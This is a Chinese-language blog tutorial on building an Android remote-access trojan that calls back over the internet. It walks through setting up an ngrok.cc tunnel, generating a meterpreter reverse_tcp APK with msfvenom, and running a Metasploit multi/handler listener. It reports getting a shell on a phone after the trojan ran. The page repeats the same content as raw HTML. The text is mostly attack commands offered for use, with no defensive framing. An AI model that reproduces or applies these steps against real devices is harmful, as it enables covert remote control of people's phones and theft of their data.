kali制作外网shell

博主： literature
发布时间：2019 年 06 月 13 日
160 次浏览
关闭评论
1121字数
分类：主机教程

配置外网环境

我这里用的是http://www.ngrok.cc其他的自行试用这个可以免费。

远程端口随便填（反正你填啥都会提示你端口已被使用：））本地端口填写你的kali ip地址也就是攻击机的地址端口随意不懂4444即可!
填写完后效果如下：

然后点击开通

下载客户端

根据你kali的版本下载
我的是64位的。

运行客户端

先看看你的clientid
在隧道管理——隧道ip中查看，如图：

记录好id后，运行下面命令

./sunny clientid 你的id

查看外网的ip

我们ping下赠送域名的ip地址

得到ip地址

制作外网shell

msfvenom -p android/meterpreter/reverse_tcp LHOST=外网ip LPORT=外网端口 R > 666.apk

**ps:**外网ip就是刚才ping出来的域名的ip地址，外网端口，就是你在添加隧道的时候，设置的端口。

生成之后，配置msf

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 内网ip
set LPORT 内网端口
exploit

填坑：
生成木马的时候，用的是外网ip和端口。配置msf的时候，我们用内网的ip和端口（很重要）
完成后，手机连接4G网络，运行木马。成功得到shell

看看手机的ip地址

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/1308.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

最后修改：2023 年 08 月 04 日

© 允许规范转载

如果觉得我的文章对你有用，请随意赞赏

此处评论已关闭

kali制作外网shell

literature • 2019 年 06 月 13 日

<h3>配置外网环境</h3><p>我这里用的是<span class="external-link"><i data-feather="external-link"></i>http://www.ngrok.cc</span>其他的自行试用 这个可以免费 。<br /><img src="https://blog.bbskali.cn/usr/uploads/2019/06/2630748467.png" alt="QQ截图20190613163138.png" title="QQ截图20190613163138.png" style="" class="aligncenter"style=""><br />远程端口随便填（反正你填啥都会提示你端口已被使用：）） 本地端口填写你的<code>kali ip</code>地址 也就是攻击机的地址 端口随意 不懂4444即可!<br />填写完后效果如下：<br /><img src="https://blog.bbskali.cn/usr/uploads/2019/06/3436075448.png" alt="QQ截图20190613161750.png" title="QQ截图20190613161750.png" style="" class="aligncenter"style=""><br />然后点击开通</p><h3>下载客户端</h3><p>根据你kali的版本下载<br />我的是<code>64</code>位的。<br /><img src="https://blog.bbskali.cn/usr/uploads/2019/06/2140492065.png" alt="QQ截图20190613161817.png" title="QQ截图20190613161817.png" style="" class="aligncenter"style=""></p><h3>运行客户端</h3><p>先看看你的<code>clientid</code><br />在<code>隧道管理</code>——<code>隧道ip</code>中查看，如图：<br /><img src="https://blog.bbskali.cn/usr/uploads/2019/06/111979619.png" alt="QQ截图20190613163651.png" title="QQ截图20190613163651.png" style="" class="aligncenter"style=""><br />记录好id后，运行下面命令</p><pre><code>./sunny clientid 你的id</code></pre><p><img src="https://blog.bbskali.cn/usr/uploads/2019/06/3733191018.png" alt="88.png" title="88.png" style="" class="aligncenter"style=""></p><h3>查看外网的ip</h3><p>我们ping下赠送域名的ip地址<br /><img src="https://blog.bbskali.cn/usr/uploads/2019/06/2031896577.png" alt="99.png" title="99.png" style="" class="aligncenter"style=""><br />得到ip地址<br /><img src="https://blog.bbskali.cn/usr/uploads/2019/06/3157564901.png" alt="999.png" title="999.png" style="" class="aligncenter"style=""></p><h3>制作外网shell</h3><pre><code>msfvenom -p android/meterpreter/reverse_tcp LHOST=外网ip LPORT=外网端口 R > 666.apk</code></pre><p><code>**ps:**</code>外网ip就是刚才ping出来的域名的ip地址，外网端口，就是你在添加隧道的时候，设置的端口。<br /><img src="https://blog.bbskali.cn/usr/uploads/2019/06/3584247229.png" alt="d.png" title="d.png" style="" class="aligncenter"style=""><br />生成之后，配置msf</p><pre><code>msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 内网ip
set LPORT 内网端口
exploit</code></pre><p><strong>填坑：</strong><br />生成木马的时候，用的是外网ip和端口。配置msf的时候，我们用内网的ip和端口（很重要）<br />完成后，手机连接4G网络，运行木马。成功得到shell<br /><img src="https://blog.bbskali.cn/usr/uploads/2019/06/2602061267.png" alt="shell.png" title="shell.png" style="" class="aligncenter"style=""><br />看看手机的ip地址<br /><img src="https://blog.bbskali.cn/usr/uploads/2019/06/1586031796.png" alt="ip1.png" title="ip1.png" style="" class="aligncenter"style=""></p><p><img src="https://blog.bbskali.cn/usr/uploads/2019/06/3816130363.jpg" alt="809626_WN67BUDJUQSWXG5.jpg" title="809626_WN67BUDJUQSWXG5.jpg" style="" class="aligncenter"style=""><br /></p><div id="player01948ed95bf494b77558e60fbdca7f49" class="dplayer"></div><script>dPlayerOptions.push({"id":"01948ed95bf494b77558e60fbdca7f49","autoplay":true,"theme":"#FADFA3","video":{"url":"http:\/\/js.bbskali.cn\/ji.flv","pic":"http:\/\/xxx.com\/xxx.jpg"},"danmaku":{"id":"3faaddfe4fa50ab7164703e0a8a188ff","token":"655445d667cb6407b3de24b761fab2b2","api":"https:\/\/api.prprpr.me\/dplayer\/","addition":["https:\/\/api.prprpr.me\/dplayer\/v3\/bilibili?aid=55868962"]}});</script><p></p><p><hr class="content-copyright" style="margin-top:50px"></p><div class="post-copyright" style="font-style:normal"><p class="iconfont-copyright"><i class="glyphicon glyphicon-copyright-mark"></i></p><p class="content-copyright">版权属于：逍遥子大表哥</p><p class="content-copyright">本文链接：https://blog.bbskali.cn/1308.html</p><p class="content-copyright">按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。</p></div>